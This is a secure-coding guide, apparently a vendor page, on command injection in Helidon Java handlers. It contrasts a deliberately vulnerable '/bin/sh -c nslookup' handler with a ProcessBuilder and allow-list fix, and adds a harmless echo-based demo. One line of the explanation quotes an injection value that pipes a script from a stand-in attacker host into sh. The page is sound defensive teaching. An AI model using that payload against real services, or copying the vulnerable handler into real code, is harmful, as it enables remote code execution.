GuardAPI

Fix Command Injection in Helidon

Command injection in Helidon SE/MP occurs when untrusted request data is concatenated into the command line handed to a process executor. If your microservice runs OS-level binaries with values taken from a ServerRequest and no strict validation, you are handing attackers a Remote Code Execution (RCE) primitive: their commands run with the identity and network reach of the service. In a containerized Helidon deployment that means full compromise of the pod, including any secrets mounted into it.

The Vulnerable Pattern

import java.io.IOException;
import io.helidon.webserver.http.ServerRequest;
import io.helidon.webserver.http.ServerResponse;

// Helidon 4 SE handler for GET /lookup, registered with the routing builder,
// e.g. HttpRouting.builder().get("/lookup", LookupService::handle)
public static void handle(ServerRequest req, ServerResponse res) {
    String host = req.query().first("host").orElse("localhost");
    // VULNERABLE: host is spliced into a command line that /bin/sh parses,
    // so shell metacharacters like ';', '|' or '&&' start a second command
    try {
        Process p = Runtime.getRuntime()
                .exec(new String[] {"/bin/sh", "-c", "nslookup " + host});
        res.send("Lookup started for: " + host);
    } catch (IOException e) {
        res.status(500).send(e.getMessage());
    }
}

The Secure Implementation

A common explanation is that Runtime.exec(String) hands the whole string to a shell. It does not: it splits the string on whitespace and starts the first token directly, so a ';' inside host is just one more argument to nslookup. The pattern is still dangerous for two reasons. First, every whitespace-separated token the attacker supplies becomes a further argv entry, so argument injection (for example a host value beginning with '-' that nslookup reads as an option) is always available. Second, as soon as the command is wrapped in a shell, as in exec(new String[]{"/bin/sh", "-c", "nslookup " + host}) or any exec("sh -c ...") variant, the full shell grammar applies and a value such as 'google.com; curl http://attacker.com/sh | sh' runs the attacker's command with the service's privileges. The fix is two-fold. First, build the command with ProcessBuilder(String...), which passes each argument to the OS execve call as one literal argv entry, so no shell ever parses the input. Second, validate host against a strict allow-list before it is used; besides shell metacharacters, reject values that start with '-' so they cannot be interpreted as nslookup options. This is defense in depth: the allow-list also protects against unexpected behaviour of the binary itself. If the service only needs the lookup result, the better fix is to spawn no process at all and resolve the name in-process with java.net.InetAddress.

import java.io.IOException;
import io.helidon.webserver.http.ServerRequest;
import io.helidon.webserver.http.ServerResponse;

// Helidon 4 SE handler for GET /lookup, registered with the routing builder,
// e.g. HttpRouting.builder().get("/lookup", LookupService::handle)
public static void handle(ServerRequest req, ServerResponse res) {
    String host = req.query().first("host").orElse("localhost");

    // 1. Strict allow-list validation: hostname characters only, first
    //    character alphanumeric so a value such as "-debug" cannot reach
    //    nslookup as an option, length capped at the DNS maximum of 253
    if (!host.matches("^[a-zA-Z0-9][a-zA-Z0-9.-]{0,252}$")) {
        res.status(400).send("Invalid hostname format");
        return;
    }

    // 2. ProcessBuilder with an argument list: host reaches execve as a
    //    single argv entry, so no shell ever parses it
    try {
        Process p = new ProcessBuilder("nslookup", host)
                .redirectErrorStream(true)
                .start();
        // Drain stdout/stderr and wait, so the child cannot block on a
        // full pipe and does not linger as a zombie
        p.getInputStream().readAllBytes();
        int exit = p.waitFor();
        res.send("Secure lookup completed, exit code " + exit);
    } catch (IOException e) {
        res.status(500).send("Execution failed");
    } catch (InterruptedException e) {
        Thread.currentThread().interrupt();
        res.status(500).send("Execution interrupted");
    }
}
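As an added, stand-alone illustration (not code from the original page or from Helidon), the following plain-JDK program pushes the same attacker-controlled value through the three execution paths discussed above: a shell wrapper, Runtime.exec(String) and ProcessBuilder. It uses /bin/echo in place of nslookup so the run is harmless and needs no network, and it finishes with a label-based hostname allow-list that also rejects option injection, plus the no-subprocess alternative. The class name ExecDemo, the PAYLOAD string and the HOSTNAME pattern are this example's own choices.

```java
import java.io.IOException;
import java.net.InetAddress;
import java.net.UnknownHostException;
import java.nio.charset.StandardCharsets;
import java.util.List;
import java.util.regex.Pattern;

/**
 * Plain-JDK demo (no Helidon dependency): the same attacker-controlled value
 * through a shell wrapper, Runtime.exec(String) and ProcessBuilder, followed by
 * the allow-list and the no-subprocess alternative. /bin/echo stands in for
 * nslookup so the run is harmless and needs no network.
 */
public class ExecDemo {

    // Constructed payload for this demo; it only prints a marker if a shell
    // interprets the ';'.
    static final String PAYLOAD = "example.com; echo INJECTED";

    // Label-based allow-list, stricter than a flat character class: each DNS
    // label is 1-63 chars and alphanumeric at both ends, whole name <= 253
    // chars. A leading '-' is therefore rejected, closing option injection.
    static final Pattern HOSTNAME = Pattern.compile(
            "^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
            + "(?:\\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*\\.?$");

    static boolean isValidHostname(String host) {
        return host != null && HOSTNAME.matcher(host).matches();
    }

    // Runs argv without any shell and returns combined stdout/stderr.
    static String run(List<String> argv) throws IOException, InterruptedException {
        Process p = new ProcessBuilder(argv).redirectErrorStream(true).start();
        String out = new String(p.getInputStream().readAllBytes(), StandardCharsets.UTF_8);
        p.waitFor();
        return out.trim();
    }

    public static void main(String[] args) throws Exception {
        // 1. Shell wrapper: /bin/sh parses the ';', so a second command runs.
        //    Prints "example.com" on one line and "INJECTED" on the next.
        System.out.println("sh -c         : " + run(List.of("/bin/sh", "-c", "echo " + PAYLOAD)));

        // 2. Runtime.exec(String) (deprecated since Java 18): no shell, but the
        //    string is split on whitespace, so "example.com;", "echo" and
        //    "INJECTED" become three extra arguments to echo. Prints
        //    "example.com; echo INJECTED" on one line: no second command,
        //    but the attacker still controls the argument vector.
        Process p = Runtime.getRuntime().exec("echo " + PAYLOAD);
        System.out.println("exec(String)  : "
                + new String(p.getInputStream().readAllBytes(), StandardCharsets.UTF_8).trim());
        p.waitFor();

        // 3. ProcessBuilder(String...): the payload is exactly one argv entry.
        //    Prints "example.com; echo INJECTED", unchanged.
        System.out.println("ProcessBuilder: " + run(List.of("/bin/echo", PAYLOAD)));

        // 4. The allow-list rejects the shell payload, the option-injection
        //    value and a malformed name, and accepts real (also IDN) names.
        for (String h : List.of("example.com", "xn--bcher-kva.example", PAYLOAD, "-debug", "a..b")) {
            System.out.printf("%-28s valid=%b%n", h, isValidHostname(h));
        }

        // 5. Preferred fix when only the answer is needed: resolve in-process,
        //    no child process at all.
        try {
            for (InetAddress a : InetAddress.getAllByName("localhost")) {
                System.out.println("localhost -> " + a.getHostAddress());
            }
        } catch (UnknownHostException e) {
            System.out.println("resolution failed: " + e.getMessage());
        }
    }
}
```

Compile and run with `javac ExecDemo.java && java ExecDemo` on any POSIX system with /bin/sh and /bin/echo. Step 2 shows why the page's regex alone is not enough: even without a shell, a value like "-debug" passes a flat [a-zA-Z0-9.-] class yet lands in argv as an nslookup option, which is why the pattern here requires each label to start with an alphanumeric character.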


Verified by Ghost Labs Security Team

This content is continuously validated by our automated security engine and reviewed by our research team. Ghost Labs analyzes over 500+ vulnerability patterns across 40+ frameworks to provide up-to-date remediation strategies.